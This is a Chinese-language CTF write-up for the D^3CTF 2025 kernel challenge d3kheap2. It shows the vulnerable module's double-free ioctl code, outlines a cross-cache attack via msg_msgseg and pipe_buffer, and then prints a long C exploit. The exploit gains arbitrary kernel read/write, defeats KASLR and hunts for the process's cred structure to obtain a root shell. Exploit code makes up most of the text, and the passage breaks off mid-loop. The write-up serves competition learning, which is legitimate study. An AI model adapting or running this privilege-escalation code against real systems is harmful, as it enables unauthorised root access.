本文最后更新于：2025年7月3日早上

《火星救援之企鹅男孩与美人a3战士与非预期解》

0x00. 一切开始之前

众所周知笔者已经从 Xidian University 本科毕业将近两年了，目前也暂时不在这个学校继续就读，因此按理来说由三大本科 CTF 战队 L-team、Vidar-Team、CNSS 组成的联合战队 El3ctronic 所举办的名为 D^3CTF 的国际赛事的出题的担子首当其冲应该不是笔者这种毕业良久的老登要考虑的事情，因此你可以看到虽然笔者在 2022、2023 年都和大企鹅鹅一起出了题但是在 2024 年我俩作为已经毕业的老登是都没有出题的，2024 年由学弟学妹们（ ~~真的有学妹学 Pwn 吗~~ ）出的 Pwn 题好像也没有出什么大状况因此一开始笔者也没有太关注今年的 D^3CTF 到底办得怎么样了毕竟 也是时候到后辈们独当一面的时候了 ，直到比赛开始的大概十天之前笔者突然想到 “今年还有个比赛呢，问问学弟们准备得咋样了” ，最后才知道三个战队的学弟学妹们（ ~~真的有学妹学 Pwn 吗~~ ） 今年一道 Pwn 题都弄不出来…

笔者寻思今年要真没 Pwn 题那这 b 比赛不是直接炸了，于是赶紧大手一挥开了一堆新建文件夹，考虑到笔者还出题的那些年基本上平均一个战队出两道题，然后再加上今年老企鹅也愿意抽空出一道题，于是笔者做了个出五道题的计划，可惜最后由于时间实在还是过于紧张了再加上确实没有准备什么过于惊艳的 idea （ ~~谁能预料到今年还得👴和🐧这种老登来救场啊~~ ）于是最后只完成了两道题，不过好在今年的比赛时间只有 24h，再加上🐧弄的一道题总共有 3 道题也算是勉强能够撑起一个 24h 的比赛了，万幸最后整个比赛还是正常地举办下去了没有出现因为缺题目导致的特殊状况严重后果（大嘘

至于比赛举办过程中出现的一些其他突发情况那就不是👴能够管辖的范围了，毕竟作为现任队员的小东西们总归是需要自己去独当一面来维持战队的这块招牌的，至少在事态没闹太大之前笔者认为自己作为毕业的老登是不适宜直接参与决策的， ~~再说了都毕业这么久了还天天干政那👴不成慈禧了~~ ，不过仔细很多事情本来也未必就能有一个体面的收场

其他的就暂且不论了，虽然从最后的解题数量来看没有被爆得太烂，但是从题目质量上来看相比起 2023 年的那道题而言笔者自己对今年的题目其实是不太满意的（ ~~虽然在最近的比赛当中你或许很难找到这个程度的 CTF 题目了~~ ），不过想到今年的出题时间比较限制，笔者觉得这或许也是无可奈何的事情，但无论如何，笔者还是希望你能喜欢今年的这两道融合了笔者数个日夜心血的题目：）

你以为批话环节到这就结束了？too young too simple！后面针对每道不同的题目还会有不同的批话大放送（错乱

以及由于笔者先写的英文博客，所以本文主要是由英文博客翻译过来， 在语序上可能会有一些大家喜闻乐见（？）的翻译腔 ，希望不要介意：）

0x01. D3KHEAP2 | 6 Solves

“Once I was seven years old my arttnba3 told me”

“go make yourself some d3kheap or you’ll be lonely”

“Soon I’ll be 60 years old will I think the kernel pwn is cold”

“Or will I have a lot of baby heap who can sign me in”

Copyright(c) 2025 <ディーキューブ・シーティーエフカーネル Pwn 製作委員会>

Author: arttnba3 @ L-team x El3ctronic x D^3CTF

You can get the attachment at https://github.com/arttnba3/D3CTF2025_d3kheap2.

Introduction

这道题目和 2022 年的 d3kheap 一样不需要花太多精力进行逆向，题目给了一个内核模块 d3kheap2.ko ，其只有一个有用的核心函数 d3kheap2_ioctl() ，核心功能只有从独立的 kmem_cache d3kheap2_cache 当中进行对象分配，漏洞点在于对内核对象的引用计数的初始化错误导致能够将一个对象释放两次：

static long d3kheap2_ioctl(struct file*filp, unsigned int cmd, unsigned long arg)
{
    struct d3kheap2_ureq ureq;
    long res = 0;

    spin_lock(&d3kheap2_globl_lock);

    if (copy_from_user(&ureq, (void*) arg, sizeof(ureq))) {
        logger_error("Unable to copy request from userland!\n");
        res = -EFAULT;
        goto out;
    }

    if (ureq.idx >= D3KHEAP2_BUF_NR) {
        logger_error("Got invalid request from userland!\n");
        res = -EINVAL;
        goto out;
    }

    switch (cmd) {
    case D3KHEAP2_OBJ_ALLOC:
        if (d3kheap2_bufs[ureq.idx].buffer) {
            logger_error(
                "Expected slot [%d] has already been occupied!\n",
                ureq.idx
            );
            res = -EPERM;
            break;
        }

        d3kheap2_bufs[ureq.idx].buffer = kmem_cache_alloc(
            d3kheap2_cachep,
            GFP_KERNEL | __GFP_ZERO
        );
        if (!d3kheap2_bufs[ureq.idx].buffer) {
            logger_error("Failed to alloc new buffer on expected slot!\n");
            res = -ENOMEM;
            break;
        }

        /* vulnerability here */
        atomic_set(&d3kheap2_bufs[ureq.idx].ref_count, 1);
        atomic_inc(&d3kheap2_bufs[ureq.idx].ref_count);

        logger_info(
            "Successfully allocate new buffer for slot [%d].\n",
            ureq.idx
        );

        break;
    case D3KHEAP2_OBJ_FREE:
        if (!d3kheap2_bufs[ureq.idx].buffer) {
            logger_error(
                "Expected slot [%d] had not been allocated!\n",
                ureq.idx
            );
            res = -EPERM;
            break;
        }

        if (atomic_read(&d3kheap2_bufs[ureq.idx].ref_count) <= 0) {
            logger_error("You're not allowed to free a free slot!");
            res = -EPERM;
            break;
        }

        atomic_dec(&d3kheap2_bufs[ureq.idx].ref_count);
        kmem_cache_free(d3kheap2_cachep, d3kheap2_bufs[ureq.idx].buffer);

        logger_info(
            "Successfully free existed buffer on slot [%d].\n",
            ureq.idx
        );

        break;
    case D3KHEAP2_OBJ_EDIT:
        logger_error(
            "🕊🕊🕊 This function hadn't been completed yet bcuz I'm a pigeon!\n"
        );
        break;
    case D3KHEAP2_OBJ_SHOW:
        logger_error(
            "🕊🕊🕊 This function hadn't been completed yet bcuz I'm a pigeon!\n"
        );
        break;
    default:
        logger_error("Got invalid request from userland!\n");
        res = -EINVAL;
        break;
    }

out:
    spin_unlock(&d3kheap2_globl_lock);

    return res;
}

老朋友们或许注意到了今年这道题从题目架构设计上似乎和 d3kheap 高度类似，因为今年的重点在于更先进的 exploitation 技术，当年的题目在于对通用 kmem_cache 上的 double free 的利用通法，而今年则关注于对 任意 kmem_cache 上的 double free 的高成功率的利用通法

Exploitation

由于漏洞对象在独立的 kmem_cache 当中，我们很容易想到应当使用 cross-cache attack ：

首先堆喷分配大量题目对象，再将其全部释放，从而填满题目的 kmem_cache 以将部分 SLUB pages 释放回 buddy system
在另一个 kmem_cache 上进行大量分配取回这些页面，这里我们选择 system V IPC 作为第一阶段的漏洞利用对象
将垂悬指针进行释放以在 msg_msgseg 上构造 UAF，之后重新分配该对象回来以使得两个 msg_msgseg 指向同一个内核对象
将其中一个释放并重新分配为 pipe_buffer ，因为其 GFP flag 与 msg_msgseg 相同，都从 kmalloc-cg 分配（当 CONFIG_SLAB_BUCKETS 未启用时）
通过 msg_msgseg 修改 pipe_buffer 以在内核空间获取任意内存读写的权能

下面的便是我们最终的利用程序，在超过 1024 次的本地测试当中其最终的利用成功率约为 99.32% ，在笔者看来应当已经足够稳定了

需要注意的是在打远程的时候你可以通过使用 musl-gcc 编译来缩减二进制文件的大小，或是手写汇编代码 ~~如果你比较闲的话~~

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/prctl.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf(SUCCESS_MSG("[*] Process binded to core ") "%d\n", core);
}

void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

struct cred {
    long usage;
    uint32_t uid;
    uint32_t gid;
    uint32_t suid;
    uint32_t sgid;
    uint32_t euid;
    uint32_t egid;
    uint32_t fsuid;
    uint32_t fsgid;
};

int get_msg_queue(void)
{
    return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
 * the msgp should be a pointer to the `struct msgbuf`,
 * and the data should be stored in msgbuf.mtext
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

#ifndef MSG_COPY
    #define MSG_COPY 040000
#endif

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 
                  MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

/**
 * Challenge Interface
**/

#define D3KHEAP2_OBJ_ALLOC  0x3361626e
#define D3KHEAP2_OBJ_FREE   0x74747261
#define D3KHEAP2_OBJ_EDIT   0x54433344
#define D3KHEAP2_OBJ_SHOW   0x4e575046

struct d3kheap2_ureq {
    size_t idx;
};

int d3kheap2_alloc(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_ALLOC, &ureq);
}

int d3kheap2_free(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_FREE, &ureq);
}

int d3kheap2_edit(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_EDIT, &ureq);
}

int d3kheap2_show(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_SHOW, &ureq);
}

/**
 * Exploitation procedure
**/

#define D3KHEAP2_BUF_NR 0x100
#define D3KHEAP2_OBJ_SZ 2048
#define KMALLOC_2K_OBJ_PER_SLUB 16

#define MSG_QUEUE_NR 0x400
/* it cannot be big because the system limits that */
#define MSG_SPRAY_NR 2
#define MSG_SCAVENGER_SZ (D3KHEAP2_OBJ_SZ - 0x30)
#define MSG_SPRAY_SZ (0x1000 - 0x30 + D3KHEAP2_OBJ_SZ - 8)
/* prepare_copy() will do allocation, so we use bigger size for msg_msgseg */
#define MSG_PEEK_SZ (0x1000 - 0x30 + 0x1000 - 8)
#define MSG_TAG_BASE 0x3361626e74747261

#define PIPE_FCNTL_SZ (0x1000 * 32)
#define PIPE_SPRAY_NR 0x180

struct pipe_buffer *fake_pipe_buf;
struct pipe_buf_operations *pipe_ops;
unsigned int pipe_flags;
unsigned long pipe_private;
int pipe_fd[PIPE_SPRAY_NR][2], atk_pipe[2];
int victim_pipe, ovlp_pipe;

void arbitrary_read_by_pipe(
    size_t page_addr,
    void *buf,
    size_t len,
    int atk_msgq,
    size_t *msg_buf,
    size_t msgsz,
    long msgtyp
)
{
    if (read_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0){
        err_exit("FAILED to read msg_msg and msg_msgseg!");
    }

    fake_pipe_buf = (struct pipe_buffer*) &msg_buf[511];
    fake_pipe_buf->page = (struct page*) page_addr;
    fake_pipe_buf->len = 0xff8;
    fake_pipe_buf->offset = 0;
    fake_pipe_buf->flags = pipe_flags;
    fake_pipe_buf->ops = pipe_ops;
    fake_pipe_buf->private = pipe_private;

    /*
    for (int i = 0; i < 0x80; i++) {
        char ch[8];
        for (int j = 0; j < 8; j++) {
            ch[j] = 'A' + i;
        }

        msg_buf[500 + i] = *(size_t*) ch;
    }
    */

    if (write_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0) {
        err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
    }

    if (read(atk_pipe[0], buf, 0xff0) < 0) {
        perror("[x] Unable to read from pipe");
        err_exit("FAILED to read from evil pipe!");
    }
}

void arbitrary_write_by_pipe(
    size_t page_addr,
    void *buf,
    size_t len,
    int atk_msgq,
    size_t *msg_buf,
    size_t msgsz,
    long msgtyp
)
{
    fake_pipe_buf = (struct pipe_buffer*) &msg_buf[516];

    if (read_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0){
        err_exit("FAILED to read msg_msg and msg_msgseg!");
    }

    fake_pipe_buf->page = (struct page*) page_addr;
    fake_pipe_buf->len = 0;
    fake_pipe_buf->offset = 0;
    fake_pipe_buf->ops = pipe_ops;

    if (write_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0) {
        err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
    }

    len = len > 0xffe ? 0xffe : len;

    if(write(atk_pipe[1], buf, len) < 0) {
        perror("[x] Unable to write into pipe");
        err_exit("FAILED to write into evil pipe!");
    }
}

#define D3KHEAP2_BUF_SPRAY_NR D3KHEAP2_BUF_NR

void exploit(void)
{
    struct pipe_buffer *leak_pipe_buf;
    int reclaim_msgq[MSG_QUEUE_NR], atk_msgq;
    int vuln_msgq[MSG_QUEUE_NR], evil_msgq[MSG_QUEUE_NR];
    int vulq_idx, vulm_idx, evilq_idx, evilm_idx, found;
    size_t pipe_spray_nr, msg_spray_nr;
    int d3kheap2_fd;
    char err_msg[0x1000];
    size_t buf[0x1000], msg_buf[0x1000];
    size_t kernel_leak, current_pcb_page, *comm_addr;
    uint32_t uid, gid;
    uint64_t cred_kaddr, cred_kpage_addr;
    struct cred *cred_data;
    char cred_data_buf[0x1000];
    int errno;
    struct rlimit rl;

    log_info("[*] Preparing env...");

    rl.rlim_cur = 4096;
    rl.rlim_max = 4096;
    if (setrlimit(RLIMIT_NOFILE, &rl) == -1) {
        perror("[x] setrlimit");
        err_exit("FAILED to expand file descriptor's limit!");
    }

    bind_core(0);

    memset(buf, 0, sizeof(buf));

    d3kheap2_fd = open("/proc/d3kheap2", O_RDWR);
    if (d3kheap2_fd < 0) {
        perror(ERROR_MSG("[x] Unable to open chal fd"));
        err_exit("FAILED to open /dev/d3kheap2!");
    }

    log_info("[*] Preparing msg_queue...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((reclaim_msgq[i] = get_msg_queue()) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to allocate no.%d reclaim msg_queue",
                i
            );
            perror(err_msg);
            err_exit("FAILED to allocate msg_queue for clearing partial SLUB!");
        }
    }

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((vuln_msgq[i] = get_msg_queue()) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to allocate no.%d vuln msg_queue",
                i
            );
            perror(err_msg);
            err_exit("FAILED to allocate msg_queue to be UAF!");
        }
    }

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((evil_msgq[i] = get_msg_queue()) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to allocate no.%d evil msg_queue",
                i
            );
            perror(err_msg);
            err_exit("FAILED to allocate msg_queue to be evil!");
        }
    }

    if (atk_msgq = get_msg_queue() < 0) {
        perror("[x] Unable to allocate attacker msg_queue");
        err_exit("FAILED to allocate msg_queue for attacking!");
    }

    log_info("[*] Preparing msg_msg...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < MSG_SPRAY_NR; j++) {
            if (write_msg(
                reclaim_msgq[i],
                buf,
                0x1000 - 0x30,
                MSG_TAG_BASE + j
            ) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to prealloc %d-%d 4k msg_msg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    log_info("[*] Preparing pipe_buffer...");

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if (pipe(pipe_fd[i]) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to create %d pipe\n",
                i
            );
            perror(err_msg);
            err_exit("FAILED to prepare pipe_buffer!");
        }
    }

    log_info("[*] Spraying d3kheap2 buffer...");

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((errno = d3kheap2_alloc(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to allocate no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to allocate d3kheap2 buffer!");
        }
    }

    log_info(
        "[*] Freeing d3kheap2 buffer into buddy "
        "and reclaiming as kmalloc-cg-2k SLUB page..."
    );

    pipe_spray_nr = msg_spray_nr = 0;

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((i / KMALLOC_2K_OBJ_PER_SLUB) % 2 == 0) {
            continue;
        }

        if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to free no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to free d3kheap2 buffer!");
        }
    }

    log_info("[*] Spraying msg_msg to reclaim...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < (MSG_SPRAY_NR / 2); j++) {
            if (read_msg(reclaim_msgq[i],buf,0x1000-0x30,MSG_TAG_BASE+j) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to reclaim %d-%d 4k msg_msg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to reclaim msg_msg!");
            }

            buf[520] = i;
            buf[521] = j;

            if (write_msg(vuln_msgq[i],buf,MSG_SPRAY_SZ,MSG_TAG_BASE+j) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((i / KMALLOC_2K_OBJ_PER_SLUB) % 2 != 0) {
            continue;
        }

        if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to free no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to free d3kheap2 buffer!");
        }
    }

    log_info("[*] Spraying msg_msg to reclaim...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = MSG_SPRAY_NR / 2; j < MSG_SPRAY_NR; j++) {
            if (read_msg(reclaim_msgq[i],buf,0x1000-0x30,MSG_TAG_BASE+j) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to reclaim %d-%d 4k msg_msg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to reclaim msg_msg!");
            }

            buf[520] = i;
            buf[521] = j;

            if (write_msg(vuln_msgq[i], buf, MSG_SPRAY_SZ, MSG_TAG_BASE+j) < 0){
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    /* To be honest, we only need to free ONE obj here, just think :) */
    log_info("[*] Creating UAF on msg_msg...");

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to free no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to free d3kheap2 buffer!");
        }
    }

    found = 0;
    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < MSG_SPRAY_NR; j++) {
            buf[520] = *(size_t*) "arttnba3";
            buf[520] += i;
            buf[521] = *(size_t*) "D3CTFPWN";
            buf[521] += j;

            if (write_msg(evil_msgq[i], buf, MSG_SPRAY_SZ, MSG_TAG_BASE + j)<0){
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
                    i,
                    j);
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    /* make sure the UAF object is on CPU SLAB, so no more spray then */
    for (int k = 0; k < MSG_QUEUE_NR; k++) {
        for (int l = 0; l < MSG_SPRAY_NR; l++) {
            if (peek_msg(vuln_msgq[k], buf, MSG_PEEK_SZ, l) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to peek %d-%d msg_msg\n",
                    k,
                    l
                );
                perror(err_msg);
                err_exit("FAILED to peek msg_msg!");
            }

            if (buf[520] == *(size_t*) "arttnba3"
                || buf[521] == *(size_t*) "D3CTFPWN") {
                evilq_idx = buf[520] - *(size_t*) "arttnba3";
                evilm_idx = buf[521] - *(size_t*) "D3CTFPWN";
                vulq_idx = k;
                vulm_idx = l;
                printf(
                    SUCCESS_MSG("[+] Found victim on no.")"%d "
                    SUCCESS_MSG("msg in no.")"%d"SUCCESS_MSG("vulqueue")
                    SUCCESS_MSG(".Same msg is on no.")"%d "
                    SUCCESS_MSG("msg in no.")"%d \n",
                    vulm_idx,
                    vulq_idx,
                    evilm_idx,
                    evilq_idx
                );
                found = 1;
                goto out_uaf_msg;
            }
        }
    }

    if (!found) {
        err_exit("FAILED to create cross-cache UAF by spraying msg_msg!");
    }

out_uaf_msg:
    log_info("[*] Shifting obj-overlapping from msg_msg to pipe_buffer...");

    if (read_msg(vuln_msgq[vulq_idx],buf,MSG_SPRAY_SZ,MSG_TAG_BASE+vulm_idx)<0){
        perror("[x] Unable to free the victim msg_msg");
        err_exit("FAILED to free victim msg_msg!");
    }

    for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 32) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to fcntl(F_SETPIPE_SZ) on no.%d pipe",
                i
            );
            perror(err_msg);
            err_exit("FAILED to reclaim msg_msg with pipe_buffer!");
        }
    }

    if (read_msg(
        evil_msgq[evilq_idx],
        buf,
        MSG_SPRAY_SZ,
        MSG_TAG_BASE + evilm_idx
    ) < 0) {
        perror("[x] Unable to free the victim msg_msg");
        err_exit("FAILED to free victim msg_msg!");
    }

    /* identification */
    for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
        /* The greate j8 helps us a lot :) */
        for (int j = 0; j < 8; j++) {
            write(pipe_fd[i][1], &i, sizeof(i));
        }
    }

    found = 0;
    for (int i = (PIPE_SPRAY_NR / 2); i < PIPE_SPRAY_NR; i++) {
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 32) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to fcntl(F_SETPIPE_SZ) on no.%d pipe",
                i
            );
            perror(err_msg);
            err_exit("FAILED to reclaim msg_msg with pipe_buffer!");
        }

        for (int j = 0; j < 114; j++) {
            write(pipe_fd[i][1], &i, sizeof(i));
        }

        /**
         * we keep checking to make sure that the object is allocated
         * from the first object of CPU SLUB, hence no spray later
         */
        for (int j = 0; j < (PIPE_SPRAY_NR / 2); j++) {
            int ident;
            read(pipe_fd[j][0], &ident, sizeof(ident));
            if (ident != j) {
                printf(
                    SUCCESS_MSG("[+] Found victim pipe: ")"%d"
                    SUCCESS_MSG(" , overlapped with ")"%d\n",
                    j,
                    ident
                );
                victim_pipe = j;
                ovlp_pipe = ident;
                goto out_overlap_pipe;
            }
            write(pipe_fd[j][1], &ident, sizeof(ident));
        }
    }

    if (!found) {
        err_exit("FAILED to shift OVERLAP from msg_msg to pipe_buffer!");
    }

out_overlap_pipe:
    close(pipe_fd[victim_pipe][1]);
    close(pipe_fd[victim_pipe][0]);

    if (pipe(atk_pipe) < 0 || fcntl(atk_pipe[1], F_SETPIPE_SZ, 0x1000*32) < 0) {
        err_exit("FAILED to allocate new pipe for attacking!");
    }

    /* move to pipe_buffer[1] */
    write(atk_pipe[1], "arttnba3", 8);
    read(atk_pipe[0], buf, 8);
    write(atk_pipe[1], "arttnba3", 8);

    close(pipe_fd[ovlp_pipe][1]);
    close(pipe_fd[ovlp_pipe][0]);

    memset(buf, 0, sizeof(buf));
    if (write_msg(atk_msgq, buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
        perror("[x] Unable to allocate new msg_msg");
        err_exit("FAILED to reclaim the victim pipe_buffer as msg_msg!");
    }

    write(atk_pipe[1], "arttnba3", 8);

    if (read_msg(atk_msgq, msg_buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
        perror("[x] Unable to peek the victim object");
        err_exit("FAILED to peek the victim object!");
    }

    leak_pipe_buf = (void*) &msg_buf[516];

    printf(
        SUCCESS_MSG("[+] Leak pipe_buffer::page ") "%p"
        SUCCESS_MSG(", pipe_buffer::ops ") "%p\n",
        leak_pipe_buf->page,
        leak_pipe_buf->ops
    );

    pipe_flags = leak_pipe_buf->flags;
    pipe_ops = (void*) leak_pipe_buf->ops;
    pipe_private = leak_pipe_buf->private;

    vmemmap_base = (size_t) leak_pipe_buf->page & KASLR_MASK;
    log_info("[*] Try to guess vmemmap_base...");
    printf("[*] Starts from %lx...\n", vmemmap_base);

    if (write_msg(atk_msgq, msg_buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
        perror("[x] Unable to allocate new msg_msg");
        err_exit("FAILED to reclaim the victim pipe_buffer as msg_msg!");
    }

    arbitrary_read_by_pipe(
        vmemmap_base + 0x9d000 / 0x1000 * 0x40,
        buf,
        0xff0,
        atk_msgq,
        msg_buf,
        MSG_SPRAY_SZ,
        MSG_TAG_BASE
    );

    kernel_leak = buf[0];
    for (int loop_nr = 0; 1; loop_nr++) {
        if (kernel_leak > 0xffffffff81000000
            && (kernel_leak & 0xff) < 0x100) {
            kernel_base = kernel_leak & 0xfffffffffffff000;
            if (loop_nr != 0) {
                puts("");
            }
            printf(
                INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
            );
            printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
            printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
            break;
        } else {
            printf("[?] Got leak: %lx\n", kernel_leak);
            sleep(2);
        }

        for (int i = 0; i < 80; i++) {
            putchar('\b');
        }
        printf(
            "[No.%d loop] Got unmatched data: %lx, keep looping...",
            loop_nr,
            kernel_leak
        );

        vmemmap_base -= KASLR_GRANULARITY;
        arbitrary_read_by_pipe(
            vmemmap_base + 0x9d000 / 0x1000 * 0x40,
            buf,
            0xff0,
            atk_msgq,
            msg_buf,
            MSG_SPRAY_SZ,
            MSG_TAG_BASE
        );
    }

    log_info("[*] Seeking task_struct in kernel space...");

    prctl(PR_SET_NAME, "arttnba3pwnn");
    uid = getuid();
    gid = getgid();

    for (int i = 0; 1; i++) {
        arbitrary_read_by_pipe(
            vmemmap_base + i * 0x40,
            buf,
            0xff0,
            atk_msgq,
            msg_buf,
            MSG_SPRAY_SZ,
            MSG_TAG_BASE
        );
    
        comm_addr = memmem(buf, 0xff0, "arttnba3pwnn", 12);
        if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
            && (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
            && (comm_addr[-2] == comm_addr[-3])) {  /* should be equal */

            printf(
                SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
                (vmemmap_base + i * 0x40)
            );
            printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);

            cred_kaddr = comm_addr[-2];
            cred_data = (void*) (cred_data_buf + (cred_kaddr & (0x1000 - 1)));
            page_offset_base = cred_kaddr & KASLR_MASK;

            while (1) {
                cred_kpage_addr = vmemmap_base + \
                                (cred_kaddr - page_offset_base) / 0x1000 * 0x40;
            
                arbitrary_read_by_pipe(
                    cred_kpage_addr,
                    cred_data_buf,
                    0xff0,
                    atk_msgq,
                    msg_buf,
                    MSG_SPRAY_SZ,
                    MSG_TAG_BASE
                );
                if (cred_data->uid == uid
                    && cred_data->gid == gid) {
                    printf(
                        SUCCESS_MSG("[+] Got page_offset_base: ") "%lx\n",
                        page_offset_base
                    );
                    printf(
                        SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
                        cred_kpage_addr
                    );
                    break;
                }

